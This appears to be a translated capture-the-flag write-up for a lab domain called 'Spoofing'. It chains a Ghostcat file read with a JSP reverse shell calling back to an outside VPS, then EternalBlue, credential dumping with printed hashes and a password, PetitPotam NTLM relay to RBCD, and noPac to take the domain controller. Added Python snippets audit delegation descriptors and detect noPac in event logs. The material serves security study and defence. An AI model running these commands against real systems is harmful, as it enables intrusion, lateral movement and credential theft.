
Reference articles
https://fushuling.com/index.php/2023/10/14/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7spoofing/
https://blog.csdn.net/uuzeray/article/details/142993560
https://blog.csdn.net/m0_62466350/article/details/135874733

Entry machine
39.98.119.134
Scan it with fscan:
PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.98.119.134
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.98.119.134:8080 open
39.98.119.134:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.119.134:8080 code:200 len:7091 title:后台管理
The title (后台管理) says this is an admin backend, so run dirsearch against it.
The server turns out to be Tomcat 9.0.30, which is affected by Ghostcat, the AJP file read / file inclusion vulnerability (CVE-2020-1938, CNVD-2020-10487; the post originally cited it as CVE-2020-1983, which is a different bug). The AJP connector on port 8009 is reachable from the outside even though the quick port scan above did not list it; everything before Tomcat 9.0.31 ships with AJP listening on all interfaces and no shared secret.
https://github.com/00theway/Ghostcat-CNVD-2020-10487
PS G:\春秋\Spoofing> python .\ajpShooter.py http://39.98.119.134:8080/ 8009 /WEB-INF/web.xml read
_ _ __ _ _
/_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __
//_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
/ _ \| | |_) | _\ \ | | | (_) | (_) | || __/ |
\_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_|
|__/|_|
00theway,just for test
[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"2489-1670857638305"
[<] Last-Modified: Mon, 12 Dec 2022 15:07:18 GMT
[<] Content-Type: application/xml
[<] Content-Length: 2489
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<security-constraint>
<display-name>Tomcat Server Configuration Security Constraint</display-name>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/upload/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
<error-page>
<error-code>404</error-code>
<location>/404.html</location>
</error-page>
<error-page>
<error-code>403</error-code>
<location>/error.html</location>
</error-page>
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/error.html</location>
</error-page>
<servlet>
<servlet-name>HelloServlet</servlet-name>
<servlet-class>com.example.HelloServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>HelloServlet</servlet-name>
<url-pattern>/HelloServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>LoginServlet</display-name>
<servlet-name>LoginServlet</servlet-name>
<servlet-class>com.example.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginServlet</servlet-name>
<url-pattern>/LoginServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>RegisterServlet</display-name>
<servlet-name>RegisterServlet</servlet-name>
<servlet-class>com.example.RegisterServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegisterServlet</servlet-name>
<url-pattern>/RegisterServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>UploadTestServlet</display-name>
<servlet-name>UploadTestServlet</servlet-name>
<servlet-class>com.example.UploadTestServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadTestServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>DownloadFileServlet</display-name>
<servlet-name>DownloadFileServlet</servlet-name>
<servlet-class>com.example.DownloadFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadFileServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
</web-app>
PS G:\春秋\Spoofing>
web.xml lists an UploadServlet that accepts file uploads, so we can upload a JSP payload and then include it through AJP for RCE.
http://39.98.119.134:8080/UploadServlet
Upload the malicious file (a JSP reverse shell):
<%
// The base64 decodes to: bash -i >& /dev/tcp/47.115.130.26/1337 0>&1 (the author's VPS)
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTUuMTMwLjI2LzEzMzcgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
// Echo whatever the command writes to stdout back into the HTTP response
while((a=in.read(b))!=-1){
out.println(new String(b, 0, a));
}
out.print("</pre>");
%>
Files are stored in ./upload/4ee679481a4eafcf4735a31aa4924162/20251102022547643.txt
The file lands under /upload/, which web.xml guards with a security constraint (role admin) for direct HTTP requests; the AJP include path sidesteps that constraint because it is evaluated against the original request URI, not the included one. Run ajpShooter in eval mode so the .txt is executed as JSP:
python .\ajpShooter.py http://39.98.119.134:8080/ 8009 /upload/4ee679481a4eafcf4735a31aa4924162/20251102022547643.txt eval
The shell comes back as root straight away; for convenience, bring the host online in vshell.
flag01
flag01: flag{d25a076f-a861-48e1-b2fb-af0835532413}

Same routine as always: upload fscan, scan the intranet, set up a tunnel.
root@ubuntu:/tmp# ./fscan -h 172.22.11.1/24 -o 1.txt
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:22 open
172.22.11.76:8080 open
172.22.11.45:445 open
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.45:135 open
172.22.11.26:135 open
172.22.11.6:135 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetInfo
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
Completed 13/13
[*] Scan finished, elapsed: 7.695997805s
root@ubuntu:/tmp#

Hosts found:
172.22.11.6    XIAORANG-DC (domain controller)
172.22.11.76   this host (the entry machine)
172.22.11.26   XR-LCM3AE8B
172.22.11.45   XR-DESKTOP.xiaorang.lab, vulnerable to MS17-010
EternalBlue
[+] MS17-010 172.22.11.45 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload payload/windows/x64/meterpreter/bind_tcp
set rhosts 172.22.11.45
run
A bind payload is used because the exploit runs through the SOCKS proxy: 172.22.11.45 cannot connect back to the attacker, so Metasploit connects forward to the port the stager opens on the target.
cat C:/users/administrator/flag/flag02.txt
flag02
flag02: flag{487042e1-e5f6-4880-a6f1-1efed4972e07}

No ADCS + PetitPotam + NTLM relay
Dump the machine account's and yangmei's credentials with kiwi:
load kiwi
creds_all
Username      Domain     NTLM                               SHA1
--------      ------     ----                               ----
XR-DESKTOP$   XIAORANG   bae4bc764ee3fde96f12bb2fbe6334fe   c6434b7f1ba66c20b28d6d43103ea1f2da191128
yangmei       XIAORANG   25e42ef4cc0ab6a8ff9e3edbbda91841   6b2838f81b57faed5d860adaf9401b0edb269a6f
yangmei       XIAORANG   (plaintext password) xrihGHgoNZQ
From the analysis in the reference articles:
Spraying the usernames collected with BloodHound against the passwords/hashes obtained so far turned up no new users.
MAQ (ms-DS-MachineAccountQuota) = 0, so an ordinary user cannot add a computer account.
LDAP has no TLS, so computers cannot be added remotely either: impacket's addcomputer has two methods, SAMR and LDAPS. SAMR is blocked by MAQ = 0; LDAPS is blocked by the missing TLS on top of MAQ = 0.
The DC is vulnerable to noPac, but running it as yangmei failed: she has no CreateChild ACL on the domain's Computers container.
The DC is vulnerable to noPac, but yangmei has no WriteDacl on the current Windows machine xr-desktop, so its sAMAccountName cannot be changed.
Both DFSCoerce and PetitPotam work in the domain, but CVE-2019-1040 is not present, so DFSCoerce is dropped in favour of PetitPotam.
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
PetitPotam is the recommended route, so we use crackmapexec for the recon; -M loads a module, here webdav, which checks whether the WebClient service is running on each host.
proxychains4 crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -d xiaorang.lab -M Webdav 2>/dev/null
No ADCS + PetitPotam + NTLM relay, the approach
Attack chain: use PetitPotam against a vulnerable target that has the WebClient service running, so that it connects to our HTTP relay listener. The target authenticates to the listener with NTLM over WebDAV; we relay that authentication to LDAP on the DC and obtain the target's machine-account identity, then, as that machine account, write its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute so that our malicious machine account may impersonate users to it (resource-based constrained delegation, RBCD).
WebDAV matters for two reasons. First, the WebClient service only falls back to WebDAV when the UNC host looks like an intranet name (a single-label host, or the host@port form used below), so the coerced connection must point at such a name. Second, NTLM carried over HTTP does not negotiate signing, which is why it can be relayed to LDAP while an SMB-originated authentication would be refused; this is also why the attack needs no ADCS. If WebClient is enabled on the target, coercion techniques such as PetitPotam or PrinterBug can therefore force an authentication that, via RBCD, yields the highest privileges on the target. For the mechanics of WebClient relay see: Privilege Escalation – NTLM Relay over HTTP (Webdav); its author is also the designer of this 云境 lab.
Prerequisite: the WebClient service must be running on the target.
We use webclientservicescanner to probe for it. Only 172.22.11.26 has WebClient running, so 172.22.11.26 is the only host we can take this way.
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.6 -no-validation
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.26 -no-validation

Run on the entry machine (the one brought online with vshell): forward port 80 to the VPS
socat tcp-listen:80,reuseaddr,fork tcp:47.115.130.26:8848

Run on the VPS
./frps -c ./frps.ini
[common]
bind_port = 7099
[tcp_1200]
type = tcp
local_ip = 127.0.0.1
local_port = 8848
(frps only reads [common]; the [tcp_1200] stanza describes the proxy and belongs on the client side, where it is harmless here.)

Run on the local Kali box
./frpc -c ./frpc.ini
[common]
server_addr = vpsip
server_port = 7099
[plugin_socks6]
type = tcp
remote_port = 8848
local_port = 80
local_ip = 127.0.0.1

A curl against port 80 on the entry machine confirms the request arrives at the local Kali box, so the path target -> 172.22.11.76:80 -> VPS:8848 -> Kali:80 works.

Start ntlmrelayx with the already-compromised XR-DESKTOP$ as the malicious machine account for RBCD, then use PetitPotam to make XR-LCM3AE8B authenticate to 172.22.11.76 (the entry machine, which forwards to our relay):
proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
proxychains python PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26
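What --delegate-access writes is a binary security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity. The following is an added example, not code from the page, impacket or ntlmrelayx: it builds that self-relative descriptor in pure Python (one ACCESS_ALLOWED_ACE per allowed SID, owner and group set to BUILTIN\Administrators, which is the layout impacket's rbcd.py produces) and parses one back, which is the check a defender runs when auditing computer objects for unexpected delegation. The SIDs are placeholders.

```python
import struct

# Access mask impacket's rbcd.py puts in the ACE (full control on the object).
FULL_CONTROL = 0x000F01FF
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid):
    """Encode a textual SID (S-1-5-21-...) into its binary SID structure."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID: %s" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    out = struct.pack("<BB", revision, len(subs))
    out += authority.to_bytes(6, "big")          # IdentifierAuthority is big-endian
    out += b"".join(struct.pack("<I", s) for s in subs)
    return out


def bytes_to_sid(buf, offset=0):
    """Decode a binary SID at offset; return (text, size_in_bytes)."""
    revision, count = struct.unpack_from("<BB", buf, offset)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * count


def build_rbcd_descriptor(allowed_sids):
    """Self-relative SECURITY_DESCRIPTOR granting FULL_CONTROL to each SID.
    Layout: 20-byte header | owner SID | group SID | DACL (no SACL)."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # AceType 0x00 = ACCESS_ALLOWED_ACE_TYPE, AceFlags 0, AceSize, Mask, SID
        aces += struct.pack("<BBHI", 0x00, 0x00, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # AclRevision 2 (ACL_REVISION), Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 0x02, 0x00, 8 + len(aces), len(allowed_sids), 0) + aces
    off_owner = 20
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    control = 0x0004 | 0x8000                    # SE_DACL_PRESENT | SE_SELF_RELATIVE
    header = struct.pack("<BBHIIII", 0x01, 0x00, control, off_owner, off_group, 0, off_dacl)
    return header + owner + owner + dacl


def allowed_to_act(descriptor):
    """Return [(sid, mask)] for every ACCESS_ALLOWED ACE in the DACL.
    Run this over msDS-AllowedToActOnBehalfOfOtherIdentity of each computer
    object: any SID you did not put there yourself is an RBCD backdoor."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not (control & 0x0004) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", descriptor, pos)
        if ace_type == 0x00:
            sid, _ = bytes_to_sid(descriptor, pos + 8)
            sids.append((sid, mask))
        pos += ace_size
    return sids


if __name__ == "__main__":
    # Placeholder SID standing in for XR-DESKTOP$ (constructed, not the lab's real SID)
    sd = build_rbcd_descriptor(["S-1-5-21-1111-2222-3333-1105"])
    print(len(sd), "bytes:", allowed_to_act(sd))
```

Note that ntlmrelayx can only set this attribute because the relayed identity is XR-LCM3AE8B$ writing to its own computer object; the later getST step (S4U2self then S4U2proxy as XR-DESKTOP$) is what turns the ACE into a ticket for administrator.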
Use the XR-DESKTOP$ machine-account hash captured earlier on 172.22.11.45 to exploit the RBCD on 172.22.11.26 and request a service ticket for administrator (S4U2self followed by S4U2proxy):
proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :bae4bc764ee3fde96f12bb2fbe6334fe xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
Rename the resulting ccache and import the ticket:
export KRB5CCNAME=administrator.ccache
Add "172.22.11.26 XR-LCM3AE8B.xiaorang.lab" to /etc/hosts (Kerberos needs the hostname to match the SPN in the ticket), then psexec with the ticket and no password:
proxychains python psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
flag03
type C:\users\administrator\flag\flag03.txt
flag03: flag{4dee7605-5c85-4251-8cd5-4c9d5863ce97}

noPac
There is an MA_Admin group whose members can add accounts to the domain.
net group /domain
net group "MA_Admin" /domain
Create a new local account and connect over RDP:
net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add

Upload mimikatz and dump credentials:

privilege::debug
sekurlsa::logonpasswords
The dumped NTLM hash 1232126b24cdf8c9bd2f788a9d7c7ed1 belongs to zhanghui. He is in MA_Admin, which has CreateChild on the Computers container, so he can add machine accounts to the domain despite MAQ = 0, and noPac works (hence -create-child below):
proxychains python noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
type C:\users\administrator\flag\flag04.txt
flag04
flag04: flag{4cbea0c8-0328-4192-92e2-afb60a969fc4}
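The noPac step above leaves a clear trace on the DC: a computer account is created (event 4741) and then its sAMAccountName is changed (event 4742) to the DC's name without the trailing "$". As an added example, not part of the original write-up, here is detection logic over constructed 4741/4742 events; the field names follow the Windows security-log XML (SubjectUserName, TargetUserName, TargetSid, SamAccountName, which is "-" when unchanged), and the sample events and SIDs are made up.

```python
def find_samaccountname_spoofing(events, dc_names):
    """Flag 4742 events where a computer account's sAMAccountName was changed
    to a value without the '$' suffix or to a domain controller's name.
    Returns [(target_sid, new_name, reason, created_by_same_subject)]; the
    last field is True when the same principal created the account (4741)
    earlier in the stream, which is the noPac pattern."""
    dcs = {d.rstrip("$").upper() for d in dc_names}
    creators = {}   # TargetSid -> SubjectUserName of the matching 4741
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4741:
            creators[ev["TargetSid"]] = ev["SubjectUserName"]
            continue
        if eid != 4742:
            continue
        new_name = ev.get("SamAccountName", "-")
        if new_name == "-":
            continue    # sAMAccountName untouched in this change event
        old_name = ev["TargetUserName"]
        reasons = []
        if old_name.endswith("$") and not new_name.endswith("$"):
            reasons.append("computer account lost its '$' suffix")
        if (new_name.rstrip("$").upper() in dcs
                and old_name.rstrip("$").upper() not in dcs):
            reasons.append("new name collides with a domain controller")
        if reasons:
            same_subject = creators.get(ev["TargetSid"]) == ev["SubjectUserName"]
            alerts.append((ev["TargetSid"], new_name, "; ".join(reasons), same_subject))
    return alerts


# Constructed sample events (not real lab logs): one noPac sequence, one
# no-op change, one legitimate computer rename.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "zhanghui", "TargetUserName": "EVIL-PC$",
     "TargetSid": "S-1-5-21-1-2-3-1200"},
    {"EventID": 4742, "SubjectUserName": "zhanghui", "TargetUserName": "EVIL-PC$",
     "TargetSid": "S-1-5-21-1-2-3-1200", "SamAccountName": "XIAORANG-DC"},
    {"EventID": 4742, "SubjectUserName": "SYSTEM", "TargetUserName": "XR-DESKTOP$",
     "TargetSid": "S-1-5-21-1-2-3-1105", "SamAccountName": "-"},
    {"EventID": 4742, "SubjectUserName": "helpdesk", "TargetUserName": "OLD-PC$",
     "TargetSid": "S-1-5-21-1-2-3-1300", "SamAccountName": "NEW-PC$"},
]

if __name__ == "__main__":
    for alert in find_samaccountname_spoofing(SAMPLE_EVENTS, {"XIAORANG-DC$"}):
        print(alert)
```

The same rule with a CreateChild or ms-DS-MachineAccountQuota check on the creating principal separates a noPac attempt from a help-desk rename; installing the November 2021 updates on the DC (which add the "$" enforcement, KB5008102 and related) is the actual fix.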